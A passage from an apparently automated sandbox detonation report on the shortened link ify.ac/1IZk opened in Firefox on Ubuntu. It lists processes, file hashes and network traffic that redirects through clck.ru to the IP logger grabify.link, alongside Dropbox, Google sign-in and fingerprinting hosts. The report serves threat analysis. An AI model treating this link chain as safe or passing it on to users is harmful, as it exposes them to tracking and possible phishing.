[/usr/lib/speech-dispatcher-modules/sd_espeak-ng /etc/speech-dispatcher/modules/espeak-ng.conf]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 29086 -prefMapSize 234708 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {83c97f5e-2de9-4adb-8202-9ac78fe442ea} 1527 true tab]
/usr/lib/speech-dispatcher-modules/sd_generic
[/usr/lib/speech-dispatcher-modules/sd_generic /etc/speech-dispatcher/modules/mary-generic.conf]
/usr/lib/speech-dispatcher-modules/sd_dummy
[/usr/lib/speech-dispatcher-modules/sd_dummy /etc/speech-dispatcher/modules/dummy.conf]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 104.21.23.148:443 | ify.ac | udp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.ru | tcp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| US | 104.21.20.211:443 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
| US | 1.1.1.1:53 | shavar.prod.mozaws.net | udp |
| US | 44.242.121.21:443 | shavar.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 1.1.1.1:53 | clck.ru | udp |
| US | 1.1.1.1:53 | clck.ru | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| RU | 87.250.250.232:443 | sba.yandex.ru | tcp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 104.26.9.202:443 | grabify.link | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 1.1.1.1:53 | cfl.dropboxstatic.com | udp |
| US | 1.1.1.1:53 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 1.1.1.1:53 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | udp |
| US | 1.1.1.1:53 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | udp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | bolt.v.dropbox.com | udp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 1.1.1.1:53 | fp.dropbox.com | udp |
| US | 1.1.1.1:53 | fp.dropbox.com | udp |
| GB | 108.138.217.71:443 | fp.dropbox.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 1.1.1.1:53 | use1-turn.fpjs.io | udp |
| DE | 3.66.243.164:3478 | use1-turn.fpjs.io | tcp |
| BE | 142.251.5.84:443 | accounts.google.com | tcp |
| US | 1.1.1.1:53 | support.mozilla.org | udp |
| US | 1.1.1.1:53 | support.mozilla.org | udp |
| US | 1.1.1.1:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| BE | 142.251.5.84:443 | accounts.google.com | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 1.1.1.1:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-chains.prod.autograph.services.mozaws.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.17:80 | connectivity-check.ubuntu.com | tcp |
Files
/tmp/tmpaddon
| MD5 | 30082ae40dc48af6343db2fd22cfc645 |
| SHA1 | 3eb577555ee638e8beb01173e8f29e172747a728 |
| SHA256 | 85d4b95f9b2075daee9b0e64bce8d9d7343d0dda10e6072d7f9485a68472ee76 |
| SHA512 | 53a58bfb4c8124ad4f7655b99bfdea290033a085e0796b19245b33b91c0948fdac9f0c3e817130b352493a65d9a7a0fc8a7c1eedc618cdaa2b4580734a11cd9c |
/root/.cache/speech-dispatcher/pid/speech-dispatcher.pid
| MD5 | 8760c5a4e23fa81f23f47974d5d8f3d3 |
| SHA1 | e13a85cb10abfeaac7146f617a62f8b9b323debb |
| SHA256 | 89bc6e2014ef69af1484b812b80f2d563c26557cb210d4e9a2bf884c0aea9995 |
| SHA512 | 9ba7f32e2528b07c68d6eed1ba3ee0cc46642f57fc6392fe36fad78246ed8a6644ec1dbb7021653601019aedfa7500b5a0ab8fd937e44e366a75340cd25c0a30 |
/root/.cache/speech-dispatcher/log/speech-dispatcher.log
| MD5 | f38f2ed82ac218923488a58764f4d2f4 |
| SHA1 | 2d77061134ddbe65705dd7ede9cdd82b84943e27 |
| SHA256 | 62f48409c3a033e836b09ccee794039e475e2ec39ba5b145c54061a4a8028924 |
| SHA512 | 2eb304aefd5e23af727906a1cbd386a4541914709eabe78da13d48843957e8f381b908c2e568aaa865cdca624f081c21969c1a4b396a93978d749e79b8449edc |
/root/.cache/speech-dispatcher/log/espeak-ng.log
| MD5 | ef84f4e65f11da983c74a7bb8edb00e4 |
| SHA1 | 6a6b59b99ceba44216cfa42e5be6a1d641615ded |
| SHA256 | f56bc2309418b8e3f485b18fa4cc2a641912f03a08e3555387faa6fb925ca547 |
| SHA512 | 85019f18beeea67e60030755b3181fc3305eaade197200bd37a956dab9c4aea9ca0006f350c9def753c2036ddf851822733e9a050829b563624e9fec52fe784d |
/root/.cache/speech-dispatcher/log/mary-generic.log
| MD5 | 7b92a4d1d104620c17b8b007b82f4ea6 |
| SHA1 | fd86d4191806d10aa33baa3f47d2251dbacf461e |
| SHA256 | 7a0cea6035a30a623000fec0b0b03f597049663dcf103bb47af898a2e5db4966 |
| SHA512 | 64620869fc6c85c667f7543c5fecc6771756bf2d429295a2c6f3397deab885e373ed2542625de8e67ce696bc506c300c43a14ccb482f628b17e869cb07f0e2d2 |
/root/.cache/speech-dispatcher/log/dummy.log
| MD5 | b2b3a649e7e18f578a7d885627764958 |
| SHA1 | 9581944e1dd494b74896964a2b2db251428849be |
| SHA256 | 4d0663e7c2b22f2942d0e8eb992e7cce6350a01bde90d941a4fb1fab1e65065a |
| SHA512 | db150cd21eeea03ae2a4e0a1325f3f5d60343d08de349cb27e1da0a51402301b6271ede58f69377dc0d337e9db1071d5921a4d26f81427b74d361959d2c823e7 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:11
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
0s
Max time network
0s
Command Line
Signatures
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/module/apparmor/parameters/enabled | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus/mask | /usr/bin/dbus-daemon | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1558/attr/apparmor/current | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/mounts | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/1558/status | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1553/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/1574/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1IZk]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]
/usr/bin/dbus-daemon
[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/which
[which firefox]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/firefox
[/usr/bin/firefox https://ify.ac/1IZk]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
/root/.dbus/session-bus/f2de92a803c744e586bd87567a26b68a-0
| MD5 | 9b2fd88b4666e4e5fc2397510f9d9e0e |
| SHA1 | ecdfbfec6c858307ff9d82f5c1a81be2196921f2 |
| SHA256 | 4b1a3cc03c1571ed79a6374b99838376876618eb3626e0e6fd78f1bfadc866f5 |
| SHA512 | 5374c6fddc3edb2fa3e41c49f10d7fd9004db5ee064c330cf2ab9df8a2a0e3d5c054979efeb515d1de7d39dcf2c545a34e0219cc5482830981655f9600164952 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:11
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
24s
Command Line
Signatures
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/irq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/resource | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/vendor | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/class | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/firefox | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/task/1586/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/self/task/1599/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1612/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1IZk]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 11c67417355f45d397f6be11f62e85a6 --binary-syntax --close-stderr]
/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/bin/grep
[grep -q ^Enlightenment]
/bin/uname
[uname]
/bin/grep
[grep -q ^file://]
/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/sbin/grep
